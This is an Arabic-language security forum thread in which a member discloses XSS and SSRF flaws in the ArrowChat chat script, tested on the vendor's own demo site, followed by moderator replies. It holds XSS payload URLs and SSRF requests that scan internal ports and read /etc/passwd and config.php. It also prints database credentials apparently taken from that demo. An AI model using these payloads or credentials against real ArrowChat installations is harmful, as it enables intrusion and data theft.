Loading...

BTC Address to donate : [[address]]

Donation of [[value]] BTC Received. Thank You.
[[error]]

alzher :: عضو خاص ::
  • شكراً: 2119
  • تم شكره 2432 مرة في 392 مشاركة

\

السلام عليكم ورحمه الله وبركاته ..

\

الأب الروحي للمنتدى نسيم حب يحط سكربت شات للمنتدى اسمه arrowchat اول ما شفت السكربت ..

رحت ادور نسخه منزوعه بقوقل حصلت نسخه قديمه .. فقلت مالي الا افحص على موقع الشركة نفسها بما انها مركبه نسخه ديمو محدثه اخر اصدار ..


\

https://www.arrowchat.com

\

xss

الاصابه الاولى في ملف index.php

الاصدار رقم 1.0

كود PHP:
127.0.0.1/vb/arrowchat/public/video/index.php?rid=</s cript><s cript>al ert(xss);</sc ript


استغلال نفس الملف في الاصدار رقم 2.0

كود PHP:
https://www.site.com/arrowchat//public/video/index.php?rid="></ifra me><sc ript>ale rt(d ocument.dom ain)</sc ipt> 
الاصابه الثانيه رقم الاصدار 2.0 في ملف arrowchat/admin/forgot.php

https://www.arrowchat.com/demo.admin...min/forgot.php

نضع في خانه استعاده الايميل ..

كود PHP:
 "<xss><S cRiPt >a lert(1)</S cRiPt> 


\

ssrf

الاصابه الاولى .. اثناء المحادثه .. لاحظت ان الموقع يسمح لك بأرسال صور في الشات .. فقلت
what if i put my own logger image

نلاحظ ان المتغير message يرسل رابط صوره وتظهر للمستخدم .. تم تغير الرابط الى لوقر بصوره ..



نشوف النتايج ..



\

الاصابه الاخرى .. في ملف arrowchat/admin/includes/functions/functions_proxy_rss.php

نجرب

https://www.arrowchat.com/demo.admin...//127.0.0.1:21

بحيث كل ما تغير البورت يعطيك ريسبون بالبنر حقه واذا مو موجود يعطيك صفحه فاضيه ..



\

لقراءة ملفات السيرفر مع احترام المسار ..

https://www.arrowchat.com/demo.admin...:///etc/passwd





لقراءة ملف الكونفيج ..

https://www.arrowchat.com/demo.admin...des/config.php


كود PHP:
     define('DB_SERVER','localhost');      define('DB_USERNAME','stackman_admin');      define('DB_PASSWORD','jTu46g_7');      define('DB_NAME','stackman_demoadmin'); 
\


\


طبعا لو فرضنا ان ملف الادمن مخفي مثل حالة شات منتدانا سابقاً .. نرسل لوقر على الشات العام ومتى ما دخل الادمن من اللوحه راح يبين مساره باللوقر ..



\


في امان الله

توقيع
●○●○●○●○●○●○
qJJI Jgω∫ ɔρζρ qJJIƔI qJIƔ

(لا يغلب عسراً يسرين)ّ
●○●○●○●○●○●○
ألزم الصمــت - واحتسب عند الرب - فلكل بــداية - [نهــاية] !؟
AlZh3r
●○●○●○
أإأدعــولي بالتــوفيق و لوالديّ

●○●○●○
26 أعضاء قالوا شكراً لـ alzher على المشاركة المفيدة:
Sec4ever الحماية للأبد
  • شكراً: 3471
  • تم شكره 5312 مرة في 946 مشاركة

شغل لوز يا alzher .
راح اعقب على الموضوع و اذا شايف ان الموضوع فيه معلومات حساسة حاول تحولوا على القسم الخاص لحين ما يعلق الاغلب على تاثير الموضوع .

توقيع
2 أعضاء قالوا شكراً لـ Sec4ever على المشاركة المفيدة:
alzher :: عضو خاص ::
  • شكراً: 2119
  • تم شكره 2432 مرة في 392 مشاركة

المشاركة الأصلية كتبت بواسطة Sec4ever اقتباس :
شغل لوز يا alzher .
راح اعقب على الموضوع و اذا شايف ان الموضوع فيه معلومات حساسة حاول تحولوا على القسم الخاص لحين ما يعلق الاغلب على تاثير الموضوع .



\


الوضع في السليم .. بالنسبة للوقر الشات .. قد جربته على شات المنتدى ولا ضبط .. اعتقد يحتاج تفعيل الخاصيه بلوحة الادمن للسماح بها ..


ملف functions_proxy_rss.php خلف مجلد الادمن وهو مخفي سابقا بالموقع ..


و التجارب كانت على موقع الشركة الام ..



\


وصدقني لو فيه ضرر على الموقع راسلتك فيه قبل ما انزل الموضوع .. حمايه واستمرار المنتدى مسئوليه الجميع ..




في امان الله

توقيع
●○●○●○●○●○●○
qJJI Jgω∫ ɔρζρ qJJIƔI qJIƔ

(لا يغلب عسراً يسرين)ّ
●○●○●○●○●○●○
ألزم الصمــت - واحتسب عند الرب - فلكل بــداية - [نهــاية] !؟
AlZh3r
●○●○●○
أإأدعــولي بالتــوفيق و لوالديّ

●○●○●○
7 أعضاء قالوا شكراً لـ alzher على المشاركة المفيدة:
Sec4ever الحماية للأبد
  • شكراً: 3471
  • تم شكره 5312 مرة في 946 مشاركة

الشات فيه هفوات كثيرة على الرغم من امكانياته الرائعة . حتى دوال الحماية فيه بدائية جدا .
مزلت مع حمزة و دكتور محمد لكي يعملوا لنا حماية جيدة.
اي شئ اتمنى ان يتم ارساله .

توقيع
2 أعضاء قالوا شكراً لـ Sec4ever على المشاركة المفيدة:
أدوات الموضوع
انواع عرض الموضوع


Powered by vBulletin® Copyright ©2000 - 2020, Jelsoft Enterprises Ltd.

:: Security By : Sec4ever Team ::

جميع الحقوق محفوظة الحماية للأبد -Security 4 Ever
Sec4ever by Sec4ever
جميع الحقوق محفوظة الحماية للأبد -Security 4 Ever
Sec4ever by Sec4ever